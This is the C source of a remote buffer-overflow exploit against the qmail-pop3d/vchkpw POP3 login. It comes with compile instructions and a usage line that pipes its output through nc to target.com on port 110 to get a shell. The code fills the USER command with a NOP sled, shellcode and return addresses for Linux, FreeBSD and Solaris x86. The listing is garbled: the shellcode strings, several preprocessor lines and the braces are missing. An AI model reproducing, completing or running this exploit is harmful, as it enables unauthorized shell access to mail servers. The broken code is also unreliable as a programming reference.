qmail-qpop3d-vchkpw.c (v.3)
by: K2,

The inter7 supported vchkpw/vpopmail package (replacement for chkeckpasswd)
has big problems ;)

gcc -o vpop qmail-pop3d-vchkpw.c [-DBSD|-DSX86]
( ./vpop [offset] [alignment] ; cat ) | nc target.com 110

play with the alignment to get it to A) crash B) work.
qmail-pop3d/vchkpw remote exploit. (Sol/x86,linux/x86,Fbsd/x86) for now.
Tested agenst: linux-2.2.1[34], FreeBSD 3.[34]-RELEASE

Hi plaguez.
prop's to Interrupt for testing with bsd, _eixon an others ;)
cheez shell's :)
THX goes out to STARBUCKS*!($#!

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SIZE 260
#define NOP 0x90
#ifdef SX86
#define DEFOFF 0x8047cfc
#define NOPDEF 75
#elif BSD
#define DEFOFF 0xbfbfdbbf
#define NOPDEF 81
#define DEFOFF 0xbffffcd8
#define NOPDEF 81

char *shell =
#ifdef SX86 // Solaris IA32 shellcode, cheez
#elif BSD // fBSD shellcode, mudge@l0pht.com
#else // Linux shellcode, no idea

int main(int argc, char **argv)
int i=0,esp=0,offset=0,nop=NOPDEF;
char buffer[SIZE];

if (argc > 1) offset += strtol(argv[1], NULL, 0);
if (argc > 2) nop += strtol(argv[2], NULL, 0);

esp = DEFOFF;

memset(buffer, NOP, SIZE);
memcpy(buffer+nop, shell, strlen(shell));
for (i = (nop+strlen(shell)+1); i < SIZE; i += 4) {
*((int *) &buffer[i]) = esp+offset;

printf("user %s\n",buffer);
printf("pass ADMR0X&*!(#&*(!\n");

fprintf(stderr,"\nbuflen = %d, nops = %d, target = 0x%x\n\n",strlen(buffer),nop,esp+offset);